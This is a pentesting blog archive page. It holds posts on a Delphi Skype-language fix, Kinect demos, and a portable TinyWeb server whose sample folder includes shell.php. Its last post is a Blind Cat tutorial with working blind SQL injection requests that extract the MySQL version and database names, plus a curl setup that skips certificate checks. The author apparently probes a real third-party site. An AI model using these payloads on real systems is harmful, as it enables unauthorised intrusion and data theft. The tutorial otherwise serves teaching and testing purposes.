IT Security Lab The Playground for IT Security Specialists and Pentesters

3Jan/115

Changed language does not persist when Skype is restarted: how to solve the annoying issue

You know, I like intelligent and handy software. I really do. But I hate with my all heart when the application (or the application's author?) is eee... "too smart". ;-) And what especially makes me nervous is when author calls some idiotic application's behavior "a  feature". I think Skype is a nice example of it. Look at this:

I have the default system language in Windows set up as English, but the default one for the non-Unicode programs is set to Polish. Nothing wrong with it, right. So when I start Skype for the first time it happily detects this setting and switches its language accordingly to the Polish too. Chaaarming. ;-)

Now let's imagine that I want to change the default Skype's language permanently to English (well, I much prefer English UI in all apps, ok). Seems life is easy: click the main menu, then Tools --> Change language --> English ... and the language is changed. Now try to close Skype and open it again... What you you see: the application's language is immediately switched back to Polish! Ok, you may try to attack the problem from the different side: Tools --> Options --> Tab: General setting --> Languages combo: English, then Save. Unfortunately the effect is exactly the same: when Skype is restarted - it switches the language to the one set up as the default for non-Unicode programs (in my case: Polish). God knows why this proggy has such amazing feature, but believe me - to change the language manually after each restart is becoming pretty annoying after some time.

As usual, I google the problem and quickly found out that I am not alone: look here for example http://portableapps.com/node/21644. So can we do anything? Yes we can®! :-)

I wrote a small program which runs the Skype and then simulates mouse clicks on the main menu and kind of "pseudo-manually" switches the application's language to the default one (English). This is also a nice small example how you may access the main menu of the application "B" from the code of application "A" and execute some  functionality in application "B". No worries, we are not "literally" moving the mouse cursor the the menu, but issuing some appropriate system messages - so everything is pretty elegant.

Ok, if someone needs only executables here they are (with the source code in Delphi):

Usage is very simple: extract the executable and put it to the same folder where your SkypePortable.exe or Skype.exe is located and then run. My little program runs Skype, waits until it is loaded and switches the language to English. Job done! :-)

Some technical background

Ok, so this is how it works. First of all we have to find the Skype window in the system (assure it exists, so we may get it's handle and access its child elements). This is rather trivial, so no need to explain anything. Once the window is found this is what we are doing:

var
  menu: HMenu;
  id: integer;
  s: Array[0..255] of char;
begin
  tmrMain.Enabled := false;

  h := findWindow(pchar('tSkMainForm.UnicodeClass'), nil);  //--- find Skype's window
  menu := getMenu(h); //--- find the main menu
  GetMenuString(menu, 5, @s[0], 255, MF_BYPOSITION); //--- get the text of 6th menu item (should be '&Help')

  if string(s) <> '&Help' then  //--- current language is NOT English
  begin
    menu := getMenu(h); //--- main menu
    menu := GetSubMenu(menu, 4); //--- find the 5th menu item

    //--- activate this (5th) menu item, so all subitems can be redrawn. This is IMPORTANT!
    SendMessage(h, WM_INITMENU, WPARAM(menu), 0);
    SendMessage(h, WM_INITMENUPOPUP, WPARAM(menu),0);

    menu := GetSubMenu(menu, 2); //--- find the 3rd submenu item

    id := GetMenuItemID(menu, 9); //--- 10th menu item (select "English")
    PostMessage(h, WM_COMMAND, id, 0); //--- click it! :-)
  end;

  SendMessage(h, WM_SYSCOMMAND, SC_MINIMIZE, 0);
  application.Terminate;
end;

So 1st thing we have to do - we have to check what language is set up currently. We are getting the text of the 6th menu item and checking if it is equal to "&Help" or not. Currently it's "&Pomoc", which means the current language is not English (yea, it's Polish actually).

This is the code used for checking:

  h := findWindow(pchar('tSkMainForm.UnicodeClass'), nil);  //--- find Skype's window
  menu := getMenu(h); //--- find the main menu
  GetMenuString(menu, 5, @s[0], 255, MF_BYPOSITION); //--- get the text of 6th menu item (should be '&Help')

  if string(s) <> '&Help' then  //--- current language is NOT English
  begin
  [...]
  end;

Now we have to iterate through the menus and sub-menus and run some action on the target item. Look at this code:

    menu := getMenu(h); //--- main menu
    menu := GetSubMenu(menu, 4); //--- find the 5th menu item

    //--- activate this (5th) menu item, so all subitems can be redrawn. This is IMPORTANT!
    SendMessage(h, WM_INITMENU, WPARAM(menu), 0);
    SendMessage(h, WM_INITMENUPOPUP, WPARAM(menu),0);

    menu := GetSubMenu(menu, 2); //--- find the 3rd submenu item

    id := GetMenuItemID(menu, 9); //--- 10th menu item (select "English")
    PostMessage(h, WM_COMMAND, id, 0); //--- click it! :-)

Important detail: look at strings highlighted in red: this is important element of the code as the sub-menu with the list of languages is generated "on-the-fly" once the parent menu item is activated. Without it: the 10th menu item (language "English") simply does not exist, (hence can't be called).

One more remark: the proposed solution requires Skype user interface (Visual Style of the window) get running in "Classic Windows" mode.

Tagged as: , , , , , , , , , , 5 Comments
29Dec/101

More 3D Fun with Kinect and Delphi. You can grab and save still 3D frames!

Foreword: I am still in a Christmas mood. ;-) And considering  a really huge interest in such "sparkling marriage" (Delphi and Kinect) and a very positive feedback from you guys, - I made some quick changes in the 3D demo, (which you should already know well), and added even more cool features. This is what was done:

  • Most important thing: now you can grab 3D frames (3D data + 2D mapping), save it and run on a computer without Kinect! No need to have any drivers installed. You can give this program to your friends and they will be able to see your 3D pictures! :-)
  • 2D to 3D mapping is fixed. It's still not ideal, but much better then before.
  • You can switch on/off 2D and3D viewing mode. Pretty handy.
  • It is possible to manage motor and change tilt of the Kinect.
  • Newest version of Kinect.pas is included (Simon J Stuart - thank you for the update! More info about TKinect project is here)
  • Bug fixed here and there.

EXE is precompiled as usual, so can be used right away. Here is the link to EXE and the source code in Delphi:

http://itsecuritylab.eu/files/kinect/kinect_delphi_3dpoints.zip

To make yourself more familiar with what the story is about, I strongly encourage you to look through the previous post about the Kinect and see the movie.

How to save/load3D frame

It's pretty easy actually. Select Frame --> Save from the main menu (you didn't expected anything else, yea?), then give a name without file extension. Program will grab the current frame and create 2 BMP files: one for 2D and the other for the 3D data (yes, they are just regular BMP files).

Those files would have a special suffix inside. A keywords: _KinectRGB and _KinectDepth.

If you want to open a frame: go to Frame --> Load and point to any of those two files. Program would find it's way to load them properly :-)

3D view on/off

There is nothing to explain here really.

Some sample images are included in the package (e.g. a nice 3D view of my corridor) :-)

This is it. Have fun and definitely drink enough to celebrate a New Year properly!

Tagged as: , , , , , , , , , , , , 1 Comment
27Dec/1018

Having Fun with Kinect and Delphi (examples of 2D and 3D visualization)

Well well well... All signs in the Sky and on the Earth clearly say: it's a Christmas time! So it's time to have some rest and fun, and definitely nothing can be better then to spend some time with family and a new toy. ;-) Actually it's my son who got the XBox with the Kinect, but well... let parents have some fun too, right!

It's not like I am trying to reinvent the wheel (there are plenty of applications using Kinect on PC), but recently I did not find any nice examples of how this incredibly cool thing can be used with Delphi. And you don't think I can leave it "just like that", don't you? ;-) So see the results below (video) and so more technical details of both applications (2D and 3D visualization). So as for today there will be no hacking, boys and girls, but just pure awesome 3D-virtual-reality joy... :-)

Ok, so you want to try to get those samples tweak them probably and run your own code? There is nothing more simple:

Prerequisits:

Everything is installing like a charm. Some subtle obstacles with GLScene, but nothing too complicated to be mentioned really. Important: Before you run anything - be sure that the Kinect device is recognizable by your computer (check it in you Device Management panel).

Ach, almost forgotten: take the source files of my applications from here:

Running all that stuff

Now you can try to compile and test both applications. More details about how those application can be used you have already seeing in the movie. Pre-compiled exe files are already included into ZIP packages, just for your convenience. So at the end this is what we have:

2D data visualization

The experiment showing how to collect, process and draw the Kinect's data on the screen. Rather typical,- you've seen it before for sure. Additional challenge was to write a function which would be able to "track  blobs" - areas on the screen with similar pixels. This is needed to track your hands, fingers, nose or whatever you want to use. It is far far from ideal, but surprisingly works!

One more remark: this DOF function, selecting pixels in certain 3D range - is a part of the application, not the Kinect hardware.

I also hope you will forgive me such eeee... "untypical" way of getting depth data from pixel's color by such innocent transformation: RGB -> HLS -> [custom function] -> range [0..255]

3D data visualization

You can see my room (and actually yours too) in 3D in wobbling 3D virtual screen, containing tiny colorful dots :-) Do you like my Xmass tree?

So you see, Delphi is so nice and (important!) easy language (appropriate for lazy coders), so even writing pretty complex applications can take you just couple of hours. I also hope now even more people will start playing with Kinect and do some cool things, [so more happiness will come on Earth this Christmas, etc, etc.]. Remember: You are the controller®. Amen. :-)

Special thanks for Simon J Stuart for his TKinect Delphi component
and for Jet Noir (http://soundcloud.com/jet-noir) for her music for the video!

This is it. Let me know it you like those crazy apps, and well... Have a nice Christmas and a happy New Year! :-)

Tagged as: , , , , , , , , , , , , 18 Comments
24Sep/1010

TinyWeb: Pocket-size Portable Web Server With CGI And PHP Support (!)

You know, each of us has some tools we really like to use. Tools which are not "just good". We simply love them. They are nice-looking, reliable, and (this is especially important) - simple and easy to use. One of such little toys I use quite often in exploitation practice (and obviously, in many other weird experiments): is a freeware TinyWeb web server created by Maxim Masiutin from RitLabs. The server is extremely small (actually it's a single file only, about 60 Kb). Despite of it, this little creature serves HTML, executes CGI, supports SSL, writes logs, etc., etc. Full list of features you may find [here].

It's a really nice tool, and recently I had an opportunity to improve TinyWeb server a little bit, so want to share it with you. Obviously this is still not such a full-featured server as Wamp, but it is tiny, handy and can be a significant part of your "pocket hacking toolset". How to use it for your own benefit - I would leave it to you. :-)

So what functionality I added

  • TinyWeb supports PHP (Yeeeeaa!). (Can you imagine a web server without PHP? I can't.) Surprisingly, original version of the server had some difficulties running PHP. Now source code is slightly changed, so everything works smoothly. Note: PHP is running as CGI.
  • The server is 100% portable now! No need for installation or configuration: just copy it to any folder, make a single click and voila! everything is configured and running immediately (yes, PHP is also configured automatically).
  • PHP files may be placed in any folder inside \wwwroot (note that in original TinyWeb server - CGI is handled only in \wwwroot\cgi-bin folder).

Looks good? Och, believe me, it is. Let's see what this little beast can do for us, but "first things first": see what you may download:

Download binaries:

Download source code:

Note that author (Maxim Masiutin) kindly published the source code of standard TinyWeb server only (without SSL support), so this is the only version which is modified by me now (hence supports PHP).

Running the little daemon

Ok, in our first example we will be using the version of the server with PHP support. Download it and unzip to any folder in you PC (you already did it, yea?). Now run the file "run_web_server.exe". Important: you must run it as Administrator. Same application may be used for both versions of TinyWeb: with and without SSL support. Once you have it running - everything should be self-explanatory (not much to configure really):

If you will be using the TinyWeb version with SSL - you would see the following info at the bottom:

Once we have the port chosen: press [RUN] button. Note that LPORT field is grayed now and button [RUN] is also disabled. Our server is running!

Now you can close this application completely, the TinyWeb server would be happily running in the background. How to stop the server? Oh I don't know, try to guess... ;-)

Is it really working?

Ok, the server is running, now let's browse the structure of our folders:

wwwroot
¦   index.htm
¦   index.php
¦   login.htm
¦
+---cgi-bin
        login.exe
        shell.php
        test.cmd
        test.php
        test.pl

Those files will be available "on-line" under following URLs:

http://localhost:81/index.htm

http://localhost:81/index.php

http://localhost:81/login.htm

http://localhost:81/cgi-bin/shell.php

http://localhost:81/cgi-bin/test.cmd

http://localhost:81/cgi-bin/test.php

http://localhost:81/cgi-bin/test.pl <-- to run this you must have Perl installed

Try to open it in your browser and see what would happen. :-) Actually any console program with stdIN and stdOUT may be easily handled by TinyWeb server (which is really handy).

Imagine that you have the following batch file:

When you navigate to the following URL: http://localhost:81/cgi-bin/test.cmd you can see in your browser something like this:

Nice, isn't it! :-)

Remember one important thing: PHP is supported in \wwwroot (also in any nested subfolder inside). CGI is handled only in \wwwroot\cgi-bin folder and any subfolders.

Couple of words about TinyWeb with SSL support

This is the original version of TinyWeb binary with SSL support, compiled by Maxim Masiutin. Source code unfortunately is not available, so I may not make necessary modifications, hence PHP is not supported. Sad but true.

Anyway you may download it from here along with sample SSL certificates (and of course with run_web_server.exe) and in fully portable form. So again -  nothing to configure. Just unzip, and run!

Tagged as: , , , , , , 10 Comments
14Sep/100

Blind Cat is Updated to 0.0.1.1. No More Problems With SSL Certificates!

Ok, It seems the Blind Cat tool was found to be pretty useful, so thanks all of you for downloading and testing! :-) If you don't know what is it - you are welcomed to read the previous article [here]. Recently I made some updates to the tool as during the last tests it happened that there were some issues when connecting to the target website over SSL. I think this is a good occasion to fix the thing (already done!) and explain one more time how everything works. You will see how easy is to exploit SQL injections with Blind Cat (if you know what you are doing...).

So how to use this blind... thing ;-)? Quick tutorial.

Before going further, download the new version 0.0.1.1 beta binary from [here]. Good. Now let's go through the test case step by step.

Step 1: Confirming SQL injection

So I am using Burp Suite and checking for SQL Injection in some well-know website. This is the HTTP header I am sending when testing "true" condition:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=1--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://vulnerable.com/shop/login.php
Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54

...which gives me this:

Now I am changing the header and testing the "false" condition:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=2--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://vulnerable.com/shop/login.php
Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54

...and the result is:

Very clean and nice example, right? To be sure we are really dealing with with SQL injection (not a kind of strange response from the web server) it does make sense to play some simple maths and send the following query (fragment of the header is below):

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%205=(3+2)--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
...

Once the vulnerability is confirmed we may go forward and configure our CURL parameters. Note that I am sending GET request over HTTPS (it's important in our case).

Step 2. Configuring CURL

We should open curl.config file in our main Blind Cat folder and modify it the following way (keep attention to highlighted elements):

#-------------------------------------- custom header
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
-H "Accept-Language: en-gb,en;q=0.5"
-H "Keep-Alive: 300"
-H "Content-Type: application/x-www-form-urlencoded"
-H "Referer: https://vulnerable.com/shop/login.php"
-H "Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54"

#-------------------------------------- target URL
url https://vulnerable.com/shop/index.php?exec=serv&type=1&mid=15205%20or%201=1--%20&rand=2975386456123

#-------------------------------------- use proxy or not
#-x localhost:8080

#-------------------------------------- do we need a header to preview?
#--dump-header incoming_header.txt

Now we may run the batch file test_curl_settings.cmd which executes CURL with those parameters and stores the result in the file incoming_html.htm. We have 1=1 in our header, remember? Let's check the output file (should be some content there), then change the parameter to 1=2 and then check the output file again (now should be empty). If everything is working properly - now we are ready to extract the data from the back database!

Previous version of Blind Cat was not handling the crappy certificates properly, so in result you might have the following error:

So what I did, I let CURL completely ignore the certificates checking. SSL is still used but the certificate isn't verified anymore. So the appropriate tiny change was made in test_curl_settings.cmd file and in the Blind Cat's source code. FYI: curl.exe should be called the following way now:

curl --config curl.config -k

Simple. :-)

Step 3. Let's suck some data

Now we may try to extract some real data from the back system. For the beginning - classic: getting the SQL engine version number. Note: in this case we are dealing with MySQL. SQL query to be executed:

SELECT @@version

...which in our case transforms into something like this:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=(SELECT%20((SELECT%20ASCII(SUBSTRING(@@VERSION,<char_position>,1)))><char_value>))--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
....

Note that > is a "more" sign. Now let's try to list all databases. SQL query:

SELECT schema_name FROM information_schema.schemata

...magically transforms into:

GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=(SELECT%20((SELECT%20ASCII(SUBSTRING((SELECT%20schema_name%20FROM%20information_schema.schemata%20LIMIT%20<main_iterator>,1),<char_position>,1)))><char_value>))--%20&rand=2975386456123 HTTP/1.1
Host: vulnerable.com
....

The only difference in this case is that we will be reading the multi-line output line by line, so adding LIMIT <x>, 1. Just for any case, let me remind you one more time about where those values are taken from:

All right, this is it. Don't forget to get the new [binaries] and the [source code]. So happy hacking pentesting! :-)

Tagged as: , , , No Comments
   Older Entries »

Recent Posts

Popular

Archives

Categories

Affiliated websites

Contact